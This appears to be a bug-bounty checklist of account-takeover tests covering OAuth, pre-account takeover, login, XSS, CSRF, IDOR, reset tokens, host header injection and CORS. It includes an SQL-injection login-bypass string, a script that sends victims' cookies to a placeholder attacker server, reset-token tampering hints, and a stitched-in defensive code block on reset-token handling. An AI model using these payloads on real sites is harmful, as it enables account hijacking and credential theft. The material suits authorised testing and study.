```python
# Build a parameter wordlist from Arjun's parameter database: each parameter
# name becomes a JSON-style key/value line whose value carries special characters.
params = open("Arjun/arjun/db/large.txt", "r").readlines()
params = set(params)
NewParams = set()
for param in params:
    NewParams.add('"' + param.strip() + '"' + ":" + '"' + param.strip() + '\'!@#$%^&*)(?><",')
NewParamsFile = open("new-params", "w")
for param in NewParams:
    NewParamsFile.write(param + "\n")
NewParamsFile.close()
```
[ ] OAuth to Account takeover
- Redirect_URI: open redirect, XSS, LFI
- Email parameter: check the request after confirming your email. If it contains the email parameter, try changing it to verify another account.
- CSRF: if the state parameter is not implemented or validated properly, it can lead to CSRF.
- Client secret exposure & weak cryptography
- Leaking authorization code or token: check for leaks in the Referer header.
- Access token in browser history: if it's in the URL, it can be exploited.
- No expiration of the code
- SSRF: via logo_uri, jwks_uri, sector_identifier_uri.
[ ] Pre-Account Takeover
A pre-account takeover occurs when an attacker creates a user account using one signup method, and the victim creates another account using a different signup method with the same email address. This can happen if the application fails to validate email addresses properly.
How to Hunt:
1. Try registering any email address without verifying it.
2. Try registering an account again, but this time with a different method (e.g., "Sign up with Google") using the same email address.
3. Since both accounts are linked, attempt to log in with the specified password and username to see if you can access information from the Google-linked account.
[ ] Account takeover by utilizing sensitive data exposure
Sensitive data exposure occurs when a web application fails to properly protect confidential information, resulting in the disclosure of sensitive information or data about users, or anything related to them, to a third party. Occasionally, the application displays unnecessary data, such as valid OTPs, hashes, or passwords, in the request and response. So it's a good idea to pay attention to the response and request portions.
[ ] Login
1. Check if you are able to brute force the password
2. Test for OAuth misconfigurations
3. Check if you are able to brute force the login OTP
4. Check for JWT misconfigurations
5. Test for SQL injection to bypass authentication: `admin" or 1=1;--`
6. Check if the application validates the OTP or token if
[ ] XSS to Account Takeover
If the application does not use an auth token, or you can't access the cookies because of the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password.
1. Try to exfiltrate the cookies
2. Try to exfiltrate the auth token
3. If the cookie's "domain" attribute is set, search for XSS in the subdomains and use it to exfiltrate the cookies
- PoC Example:
```html
<script>
/*
this script will create a hidden <img> element
when the browser tries to load the image
the victim's cookies will be sent to your server
*/
var new_img = document.createElement('img');
new_img.src = "http://yourserver/" + document.cookie;
new_img.style = 'display: none;';
document.body.appendChild(new_img);
</script>
```
[ ] CSRF to Account Takeover
1. Check if the email update endpoint is vulnerable to CSRF
2. Check if the password change endpoint is vulnerable to CSRF
[ ] IDOR to Account Takeover
1. Check if the email update endpoint is vulnerable to IDOR
2. Check if the password change endpoint is vulnerable to IDOR
3. Check if the password reset endpoint is vulnerable to IDOR
[ ] Account takeover by Response & Status code Manipulation
[ ] Account takeover by exploiting Weak cryptography
Check the cryptography algorithm used in the password reset token.
[ ] Password or email change function
If you try to change your password and see an email parameter in the password change request, try changing your email to the victim's email.
[ ] Sign-Up Function
If you try to sign up for a new account on the target site, try setting the target email in the email field.
If you try to sign up for a new account on the target site using a third party, use a phone number instead of an email in the third-party account, then link the third-party account with the target site. Then go to settings and try to link the victim's email to your account.
[ ] Reset Token
Try to use your reset token with the target account. Hint: `email=Target@email.com&code=$Attacker_TOKEN$`
Brute force the reset token if it is numeric. Hint: `email=Target@email.com&code=$TOKEN$`
Try to figure out how the token is generated:
1. Generated based on a timestamp, or the ID of the user, or the email of the user
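The three reset-token checks above map onto three server-side defences: the token is unpredictable (not derived from a timestamp, user ID or email), it is bound to the account it was issued for so the `email` parameter in the redeem request cannot be swapped, and it is single-use with a short expiry. The handler below is an added illustration, not code from the original page; the in-memory store, the 15-minute TTL and the function names are assumptions.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, Optional, Tuple

# Assumed in-memory store: sha256(token) -> (bound email, expiry time).
# A real application would keep this in its database.
_RESET_STORE: Dict[str, Tuple[str, float]] = {}
TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime of a reset token


def _fingerprint(token: str) -> str:
    # Store only a hash so a leaked table does not yield usable tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(email: str, now: Optional[float] = None) -> str:
    """Generate an unpredictable, expiring token bound to one account."""
    now = time.time() if now is None else now
    # CSPRNG output, not a timestamp/ID/email-derived value, so it cannot be
    # guessed or brute forced like a short numeric code.
    token = secrets.token_urlsafe(32)
    _RESET_STORE[_fingerprint(token)] = (email.lower(), now + TOKEN_TTL_SECONDS)
    return token


def redeem_reset_token(email: str, token: str, now: Optional[float] = None) -> bool:
    """Accept the token only for the account it was issued to, once, before expiry."""
    now = time.time() if now is None else now
    key = _fingerprint(token)
    entry = _RESET_STORE.get(key)
    if entry is None:
        return False
    bound_email, expiry = entry
    if now > expiry:
        del _RESET_STORE[key]
        return False
    # The email in the request is untrusted; it must match the account the
    # token was issued for (constant-time compare to avoid timing leaks).
    if not hmac.compare_digest(bound_email.encode(), email.lower().encode()):
        return False
    del _RESET_STORE[key]  # single use: a replayed token is rejected
    return True
```

Redeeming an attacker-issued token with the victim's email fails, a replay fails, and a token older than its TTL fails.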
[ ] Host Header Injection
When sending the password reset request, intercept the POST request and change the Host header value from target.site to Attacker.com. Hint: `POST /PassRest HTTP/1.1` with `Host: Attacker.com`
[ ] CORS Misconfiguration to Account Takeover
If the page contains CORS misconfigurations, you might be able to steal sensitive information from the user to take over their account, or make them change their auth information for the same purpose: